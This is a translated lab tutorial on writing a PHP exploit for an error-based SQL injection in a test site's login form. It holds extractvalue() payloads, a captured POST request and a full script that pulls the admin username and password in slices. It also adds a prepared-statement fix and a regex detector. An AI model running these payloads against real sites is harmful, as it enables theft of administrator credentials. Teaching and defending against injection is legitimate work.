
[Original] Web Security Chapter 7, Exploit Writing Part 03: Writing a POST Injection Exploit



The previous article covered writing a simple injection exploit. This one raises the difficulty and walks through a more involved exploit.


1. Writing the POST injection exploit
The login page of the moonsec lab test system (暗月靶机) has an error-based SQL injection.

First query the length of the data:
'and extractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1))))#
The text that extractvalue() reports in its error message is limited to 32 characters, so the statement above first obtains the length of the data; substring() is then used to pull the data out in slices.
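The query shape that makes this injection possible, beside a hardened version, as an added example that is not code from the original post. It runs offline on an in-memory SQLite database with constructed sample data; the table and column names (admin, username, password) are the ones named in the payload above, and the function names are my own. SQLite has no extractvalue(), so what leaks here is a parse/function error rather than MySQL's XPATH message, but the channel (raw database error text returned to the client) is the same one the payload relies on.

```php
<?php
// Added example, not code from the original post. In-memory SQLite with constructed data;
// table/column names taken from the post's payload, everything else is assumed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE admin (username TEXT, password TEXT)");
$db->exec("INSERT INTO admin VALUES ('admin', 'constructed-password-hash')");

// Vulnerable: user input is spliced into the SQL text, so the leading quote in the
// payload closes the string literal and everything after it is parsed as SQL. The raw
// database error is then echoed back to the client, which is the channel extractvalue()
// abuses on MySQL (here SQLite reports an unknown function / bad token instead).
function login_vulnerable(PDO $db, string $user, string $pass): string {
    $sql = "SELECT * FROM admin WHERE username='$user' AND password='$pass'";
    try {
        return $db->query($sql)->fetch() ? "login ok" : "login failed";
    } catch (PDOException $e) {
        return "Database error: " . $e->getMessage(); // leaks the error text
    }
}

// Hardened: a prepared statement sends the query text and the values separately, so the
// input is only ever compared as data. Errors are logged server-side and the client gets
// a generic message, which also closes the error-based extraction channel.
function login_hardened(PDO $db, string $user, string $pass): string {
    try {
        $stmt = $db->prepare("SELECT 1 FROM admin WHERE username = ? AND password = ?");
        $stmt->execute([$user, $pass]);
        return $stmt->fetch() ? "login ok" : "login failed";
    } catch (PDOException $e) {
        error_log($e->getMessage()); // never send $e->getMessage() to the client
        return "login failed";
    }
}

// The username value from the captured request in the post; the password is arbitrary.
$payload = "'and extractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1))))#";
echo "vulnerable: ", login_vulnerable($db, $payload, "123456"), "\n";
echo "hardened:   ", login_hardened($db, $payload, "123456"), "\n";
```

Run it with `php` on a build that has pdo_sqlite; the vulnerable function returns database error text, the hardened one only "login failed".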

(Screenshot: the moonsec lab target login page)

Writing the exploit in PHP
First capture the login request with Burp Suite:
POST /login.php HTTP/1.1
Host: www.moontester.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.moontester.com/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
Connection: close
Cookie: PHPSESSID=k343qa72c7ro2psc0ivengqap6
Upgrade-Insecure-Requests: 1

username=%27and+extractvalue%281%2C+concat%280x7e%2CLENGTH%28%28SELECT+distinct+concat+%280x23%2Cusername%2C0x3a%2Cpassword%2C0x23%29+FROM+admin+limit+0%2C1%29%29%29%29%23&password=123456&submit=%E7%99%BB%E5%BD%95
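A server-side check that flags the error-based injection pattern in a request body like the one captured above, as an added example that is not code from the original post. It is meant to run on the raw form body before it reaches the login handler, or over recorded request bodies for triage; the marker names, the function name and the second (benign) sample body are my own constructions, and the first sample body is the captured request above.

```php
<?php
// Added example, not code from the original post. Sample bodies are constructed;
// the first is the request body captured in the post.

// Markers of MySQL error-based extraction: the XML error functions, a 0x7e ('~')
// delimiter inside concat(), a quote followed by a comment token that closes the
// username literal, and a SELECT ... FROM that reads another table.
const SQLI_MARKERS = [
    'xml-error-function' => '/\b(extractvalue|updatexml)\s*\(/i',
    'tilde-delimiter'    => '/concat\s*\(\s*0x7e\b/i',
    'quote-then-comment' => '/[\'"].*(#|--\s|\/\*)/s',
    'table-read'         => '/\b(select|union)\b.*\bfrom\b/is',
];

/**
 * Decode an application/x-www-form-urlencoded body and return, per field,
 * the marker names that field matched. Fields with no match are omitted.
 */
function flag_error_based_sqli(string $body): array {
    parse_str($body, $fields);   // decodes %xx and '+' the same way PHP fills $_POST
    $hits = [];
    foreach ($fields as $name => $value) {
        if (!is_string($value)) {
            continue;            // nested array fields are out of scope here
        }
        foreach (SQLI_MARKERS as $marker => $regex) {
            if (preg_match($regex, $value)) {
                $hits[$name][] = $marker;
            }
        }
    }
    return $hits;
}

// Captured body from the post (username carries the extractvalue payload).
$captured = "username=%27and+extractvalue%281%2C+concat%280x7e%2CLENGTH%28%28SELECT+distinct+concat+%280x23%2Cusername%2C0x3a%2Cpassword%2C0x23%29+FROM+admin+limit+0%2C1%29%29%29%29%23&password=123456&submit=%E7%99%BB%E5%BD%95";
// Constructed benign body: a quote in a surname and a '#' in a password are ordinary.
$benign = "username=o%27brien&password=p%23ss%26word&submit=%E7%99%BB%E5%BD%95";

print_r(flag_error_based_sqli($captured));
print_r(flag_error_based_sqli($benign));
```

The benign body is there to show why a lone quote or '#' is not a finding; it is the combination of markers in the username field of the captured request that should be flagged.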

2. Simulating a POST request to a URL

[php]
<?php
/**
 * Send a simulated POST request to a URL.
 * @param string $url
 * @param array $post_data
 * @return string|false response body, or false when an argument is missing
 */
function request_post($url = '', $post_data = array()) {
    if (empty($url) || empty($post_data)) {
        return false;
    }

    // Build the application/x-www-form-urlencoded body; urlencode() takes care of the
    // quote, spaces, parentheses and '#' in the payload, so values are passed in decoded.
    $o = "";
    foreach ($post_data as $k => $v) {
        $o .= "$k=" . urlencode($v) . "&";
    }
    $post_data = substr($o, 0, -1); // drop the trailing '&'

    $postUrl = $url;
    $curlPost = $post_data;
    $ch = curl_init();                                    // initialise curl
    curl_setopt($ch, CURLOPT_URL, $postUrl);              // page to request
    curl_setopt($ch, CURLOPT_HEADER, 0);                  // leave response headers out of the result
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);          // return the body as a string instead of printing it
    curl_setopt($ch, CURLOPT_POST, 1);                    // submit as POST
    curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost);      // the encoded body
    $data = curl_exec($ch);                               // run the request
    curl_close($ch);

    return $data;
}
?>
[/php]

Using curl requires the PHP curl extension to be enabled: extension=php_curl.dll

This part of the request body has to be turned into a PHP array. Because request_post() calls urlencode() on every value, the values are written in decoded form (the submit value %E7%99%BB%E5%BD%95 is the UTF-8 encoding of 登录):
username=%27and+extractvalue%281%2C+concat%280x7e%2CLENGTH%28%28SELECT+distinct+concat+%280x23%2Cusername%2C0x3a%2Cpassword%2C0x23%29+FROM+admin+limit+0%2C1%29%29%29%29%23&password=1234536&submit=%E7%99%BB%E5%BD%95
As a PHP array:
$post_data = array("username" => "'and extractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1))))#", "password" => "123456", "submit" => "登录");

The complete exploit code

[php]
<?php
/**
 * Send a simulated POST request to a URL.
 * @param string $url
 * @param array $post_data
 * @return string|false response body, or false when an argument is missing
 */
function request_post($url = '', $post_data = array()) {
    if (empty($url) || empty($post_data)) {
        return false;
    }

    // Build the form body; urlencode() encodes the quote, spaces, parentheses and '#'.
    $o = "";
    foreach ($post_data as $k => $v) {
        $o .= "$k=" . urlencode($v) . "&";
    }
    $post_data = substr($o, 0, -1); // drop the trailing '&'

    $postUrl = $url;
    $curlPost = $post_data;
    $ch = curl_init();                                    // initialise curl
    curl_setopt($ch, CURLOPT_URL, $postUrl);              // page to request
    curl_setopt($ch, CURLOPT_HEADER, 0);                  // leave response headers out of the result
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);          // return the body as a string instead of printing it
    curl_setopt($ch, CURLOPT_POST, 1);                    // submit as POST
    curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost);      // the encoded body
    $data = curl_exec($ch);                               // run the request
    curl_close($ch);

    return $data;
}

# Raw body as captured by Burp, for reference:
# username=%27and+extractvalue%281%2C+concat%280x7e%2CLENGTH%28%28SELECT+distinct+concat+%280x23%2Cusername%2C0x3a%2Cpassword%2C0x23%29+FROM+admin+limit+0%2C1%29%29%29%29%23&password=123456&submit=%E7%99%BB%E5%BD%95

// Step 1: make the error message carry LENGTH() of the target row.
function get_strlen($url) {
    $post_data = array("username" => "'and extractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1))))#", "password" => "123456", "submit" => "登录");
    $html = request_post($url, $post_data);
    // The page echoes: XPATH syntax error: '~40'  (0x7e is the '~' marker)
    if (!preg_match("/~(\d+)/", $html, $matches)) {
        return 0;
    }
    return (int)$matches[1];
}

$url = "http://www.moontester.com/login.php";

$lengstr = get_strlen($url);

if ($lengstr) {
    // Step 2: characters 1-32, the most extractvalue() shows in one error message.
    $payload = array("username" => "'and extractvalue(1, concat(0x7e,substring((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1),1,32)))#", "password" => "123456", "submit" => "登录");
    $html = request_post($url, $payload);
    // Error text looks like '~#admin:...'; capture after '~#' up to the closing quote.
    preg_match("/~#(.*?)\'/", $html, $matches);
    $m1 = $matches[1];

    // Step 3: the remainder, starting at position 33 (position 32 is already in the first
    // slice; starting at 32 would repeat one character). Data longer than 64 characters
    // would need further 32-character slices.
    $payload2 = array("username" => "'and extractvalue(1, concat(0x7e,substring((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1),33,{$lengstr})))#", "password" => "123456", "submit" => "登录");
    $html = request_post($url, $payload2);
    // The row ends with 0x23 ('#'), so capture between '~' and that closing '#'.
    preg_match("/~(.*?)#/", $html, $matches);
    $m2 = $matches[1];

    echo "[+]" . $m1 . $m2 . "[+]";
} else {
    echo "[-]error[-]";
}
# Debugging: dump the raw response
# $html = request_post($url, $post_data);
# print $html;
?>
[/php]

Code explanation
First obtain the length of the data.
The first request fetches characters 1-32, the second fetches characters 32-40.
The two pieces are concatenated and printed.


Original article by mOon. If you repost it, please credit the source: https://www.moonsec.com/523.html
